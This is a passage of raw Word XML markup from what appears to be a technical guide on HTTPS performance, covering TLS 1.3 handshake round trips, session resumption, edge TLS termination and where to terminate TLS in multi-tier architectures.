    <w:p w14:paraId="404BFB6B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2026 reality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF908B8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS 1.3: 1 RTT handshake (0-RTT on resumption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D05450" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ECDHE key exchange: ~0.05ms CPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F2FE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>AES-NI hardware in every CPU (bulk encryption at 10+ GB/s — effectively free).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D2BD3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Session tickets (free resumption, no server state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75270A00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>OCSP stapling (no extra latency for revocation checks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7A5B9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP/2 multiplexing eliminates the connection-overhead concern entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D90A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 The Actual Performance Delta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D827C62" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New connection (cold):</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804"/>
        <w:gridCol w:w="4055"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="022796B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EA73CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Protocol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693BCB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>RTT to First Byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="21BA08A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CCC3C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP/1.1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7F0A47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (TCP handshake)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1D883BA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E9E339" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTPS (TLS 1.2)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BF00A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>3 RTT (TCP + TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2493F00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65C96B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTPS (TLS 1.3)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ECCD7C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2 RTT (TCP + TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="45D1412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6D130A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTPS (TLS 1.3 + 0-RTT)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804B30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (TCP + data immediately)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2F71EE4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BCA73F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP/3 (QUIC)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68D2F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (combined handshake + data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="69293A1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CDE0CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>HTTP/3 (QUIC 0-RTT)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35B9E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>0 RTT (data in first packet!)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA76604" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Existing connection (warm — keep-alive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A018E7B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Zero difference. Once the TLS session is established, the encryption overhead per request is negligible (microseconds of CPU for symmetric encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3D53B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Where HTTPS Still Has Measurable Cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD81C63" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection establishment for many short-lived connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> If your architecture creates new TCP connections frequently (no keep-alive, no connection pooling), TLS adds 1 RTT per connection. Solution: Use persistent connections (HTTP/2 makes this natural with multiplexing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5E7A5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU at extreme scale without hardware offload:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A server handling 1 million new TLS connections per second needs significant CPU for key exchange. Solution: TLS offload to hardware (network cards with TLS accelerators) or dedicated TLS termination proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F546B14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate chain size:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A typical certificate chain is 3–5KB. This increases the TLS handshake data. On slow mobile networks (high latency, low bandwidth), this adds 50–100ms to the initial handshake. Solution: Use short chains, ECC certificates (smaller than RSA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C9258" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS record overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Each TLS record adds 5 bytes of header + 16 bytes of authentication tag (AES-GCM). For small messages (20-byte API responses), this is 50%+ overhead. For typical payloads (1KB+), it's ~2% overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6F6A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8.4 HTTPS Performance Optimizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151902E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session resumption (avoiding full handshake):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51150602" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Server stores session state, client presents the ID on reconnection. Server reuses cached session parameters (1 RTT saved). Problem: server must store state for every session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9457A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Ticket:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Server encrypts session state into a ticket, gives it to the client. Client presents ticket on reconnection. Server decrypts (stateless — no server-side storage). Better for distributed systems (any server can decrypt if they share the ticket encryption key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2EB0C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early termination (TLS at the edge):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012FF53E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E002BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client (Tokyo) ←── TLS ──→ Edge PoP (Tokyo) ←── Plain TCP or separate TLS ──→ Origin (US)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D62E35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS handshake completes with a nearby edge server (5ms RTT instead of 200ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB77DE8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Edge then communicates with origin over a pre-established, optimized connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70661CEC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Total handshake time: 2×5ms = 10ms (instead of 2×200ms = 400ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18707C4D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Fast Open + TLS 1.3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D6579" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Combine TCP Fast Open (send data in the SYN packet) with TLS 1.3 0-RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AA215" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Data flows in the FIRST packet from client to server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8D246" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Theoretical minimum latency for reconnections: zero additional round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7AEAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="75C83EC8">
          <v:rect id="_x0000_i3982" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E52E96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. HTTPS in System Architecture — Design Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039277B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 TLS Termination Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC5E3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where to terminate TLS in a multi-tier architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA85215" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61B623" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Option A: Terminate at load balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719533A1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client ←HTTPS→ [LB] ←HTTP→ [App Server] ←HTTP→ [Database]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA9C4E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7B16B4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Option B: Terminate at application server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F22E456" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client ←HTTPS→ [LB (L4/passthrough)] ←HTTPS→ [App Server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E9521" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CBDD51" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Option C: End-to-end encryption (re-encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F64D75" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
